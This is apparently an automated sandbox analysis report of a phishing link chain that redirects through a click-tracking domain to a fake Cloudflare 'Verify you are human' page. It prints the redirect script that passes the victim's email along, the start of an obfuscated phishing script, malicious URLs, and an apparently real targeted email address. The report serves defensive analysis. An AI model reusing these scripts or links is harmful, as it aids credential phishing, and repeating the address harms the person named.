Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/favicon.ico	chromecache_68.1.dr	false		high
https://developers.cloudflare.com/r2/data-access/public-buckets/	chromecache_68.1.dr	false		high
https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#	chromecache_69.1.dr	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.40.248.200	pshieldnemt.com	Germany	24940	HETZNER-ASDE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
172.66.0.235	pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev	United States	13335	CLOUDFLARENETUS	false
63.32.154.112	click.pstmrk.it	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591896
Start date and time:	2025-01-15 15:34:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3Jn
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@19/12@8/6

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.174, 74.125.133.84, 142.250.184.238, 142.250.185.238, 2.23.77.188, 142.250.186.78, 142.250.185.206, 142.250.186.46, 216.58.206.46, 172.217.18.110, 216.58.212.142, 172.217.16.206, 142.250.181.227, 142.250.184.206, 142.250.181.238, 172.217.18.14, 172.202.163.200, 184.28.90.27, 2.21.65.132, 13.107.5.88
Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3Jn

Input	Output
URL: https://pshieldnemt.com/wp/#d2F0c29uLmJlY2t5QGFpZG... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script extracts an email address from the URL hash, decodes it using Base64, and then redirects the user to a different domain with the decoded email address in the URL. This behavior is considered moderately risky due to the use of dynamic URL generation and potential for data exfiltration, even though the intent is not clearly malicious." }
var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#' + decodedString; });
URL: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.de... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors: 1. Dynamic code execution: The script uses the 'eval()' function to execute remote or dynamic code, which poses a significant security risk. 2. Data exfiltration: The script sends sensitive data (e.g., cookies, user information, session identifiers) to an external server, which could be used for malicious purposes. 3. Obfuscated code/URLs: The script uses heavily encoded strings and obfuscated URLs, making it difficult to determine the true purpose of the script. Given these high-risk indicators, along with the lack of any clear legitimate context, this script is highly suspicious and should be considered a high-risk threat." }
lZbyaDHf='';function _0x49ed(){var _0x229526=['appendChild','Ctrl+Shift+I','Loading\x20in\x20progress\x20..\x20please\x20wait','#loadingScreen','data:image/png;base64,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
URL: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.org Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Performing security checks on your browser for protection.", "prominent_button_name": "Verify you are human", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.org Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true, "reasoning": "This appears to be a Cloudflare R2 storage URL with .dev TLD. While .dev is a legitimate TLD, it's less common. The subdomain contains a long hexadecimal string which is typical for cloud storage services but could be flagged as suspicious due to its length." }
URL: https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:34:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.987280291262659
Encrypted:	false
SSDEEP:	48:8B2dATx7uVJHCidAKZdA1JehwiZUklqehEJy+3:8B9wVC/y
MD5:	F48C25EC2083FDE55964A5273AA2176B
SHA1:	A4728B764B719580A7415FCCBFE4B44F832A6231
SHA-256:	FA8AA1C86336AB8C7E2B1E552EBF9E2F998AB86207C912F8AB89FF3CB97411D9
SHA-512:	D505A9311F98B39400EE3FF5A251629ECDB279745A841AF976058D453EBB99F1BEF27AD80AEE3022B441716AB52C17DF741A61BF9B7778001E3A9DCEF072291D
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,........Zg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/ZMt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/ZXt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/ZXt....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/ZXt...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/ZYt...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........JkN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:34:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.004487062415613
Encrypted:	false
SSDEEP:	48:8+2dATx7uVJHCidAKZdA10eh/iZUkAQkqeh1Jy+2:8+9wVI9QKy
MD5:	AF465DC844F4A43E694E985566467519
SHA1:	CF83679A5CD3740191C22F074EA3E22E2C6C373D
SHA-256:	41B2BAE830221420845853EB40DDB8A5AF85D74052D1B5EC8349B257F09E418B
SHA-512:	0D80FFA32C4C689228776745FB7F9B96B4AAF12049D4E9DC3A2557B3260CC7E01C894452B5DE6A77A00AB2B008F90C1AC40DBD4D993352FF3AEC9F7EACBD1EE0
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......Zg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/ZMt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/ZXt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/ZXt....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/ZXt...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/ZYt...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........JkN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.012862670878267
Encrypted:	false
SSDEEP:	48:8e2dATx7ujHCidAKZdA14tIeh7sFiZUkmgqeh7s/Jy+BX:8e9wCnDy
MD5:	CC594F28CA67F2C83117581841BAEE00
SHA1:	F28074553A41F49218E21C61FC3D34F326E82EF2
SHA-256:	F08A87F2323622D48BD8BDBA238C3A79092FF0D91C9C986423818A9277D7D851
SHA-512:	B5E4F6A5CA05F0767AE39C4B5554B022806E5F56833DC470DDBE95436585F47305F9EADF3C41E784956A788667718809F458559B915BFE463F1DF19F2296916A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/ZMt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/ZXt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/ZXt....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/ZXt...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........JkN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:34:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9994885009950583
Encrypted:	false
SSDEEP:	48:8j2dATx7uVJHCidAKZdA1behDiZUkwqeh5Jy+R:8j9wVDZy
MD5:	2C8B03CC9865438686F0162535CF84AC
SHA1:	2820D96EE02D4E12375B7DD830ED07A809B867F8
SHA-256:	313C3F5F7799E4118B2C4CC270B993B8CB31F14959E17476A3A9C44302FBBA0E
SHA-512:	B5858BFA88FE049DE2A82901DF3DAA53732C9B9FC892AC052189FA79BF78DE36E89918621084A02C3C4072EA6AF45897C843C4915A3508E1A2C4065A902DD694
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....V.Zg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/ZMt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/ZXt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/ZXt....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/ZXt...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/ZYt...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........JkN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:34:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9898576737828417
Encrypted:	false
SSDEEP:	48:8Z2dATx7uVJHCidAKZdA1VehBiZUk1W1qehbJy+C:8Z9wVT91y
MD5:	87623A77AC65F57166B3877B502B8DA9
SHA1:	7AE26DB1EB36D1C2103A855A250D8830502E4302
SHA-256:	B539828B946D8E4296BB4B8F7F09641B9CC415A8C4E8214AAF92BFB1A4AFF9A2
SHA-512:	259826AF7947D41861F5A67236EFD43EF395FEE91DC46BC4B85BF9B246EEC62979228FE3C919829B0069EF18E451EDEF867ACE9E1C7EADCAEB7E993A415E0F9F
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......Zg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/ZMt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/ZXt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/ZXt....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/ZXt...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/ZYt...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........JkN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:34:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.0008800679347365
Encrypted:	false
SSDEEP:	48:8D2dATx7uVJHCidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbhJy+yT+:8D9wVPTTTbxWOvTbDy7T
MD5:	5CECF02F1396F5BE973FB1639E81D086
SHA1:	CDBBD81F18EA651B0704913761F6F810A03CEC13
SHA-256:	735179D8418D8164E87BDA9B0EA2B30461759A8AFF8DF44C367CD4354D9955AC
SHA-512:	EED412070E8C03166BBBAF11E4FAB425792A93B04778783B89D9985EFBBA836514575014B25FCCCB5A2CD49FE436D5FA5C079B4164F1E73906F344B97D7B02F9
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....`..Zg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/ZMt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/ZXt....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/ZXt....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/ZXt...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/ZYt...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........JkN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (611)
Category:	downloaded
Size (bytes):	27150
Entropy (8bit):	4.357340680151037
Encrypted:	false
SSDEEP:	384:6bamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:603Mp5If8WOmgW3
MD5:	46DD133EE00DC1BAE5E4EEBA7B88432F
SHA1:	8AF86A4AC91CE48C062216FB94A6E1D57618A19B
SHA-256:	9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
SHA-512:	CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
Malicious:	false
Reputation:	low
URL:	https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/favicon.ico
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

Chrome Cache Entry: 69

Download File

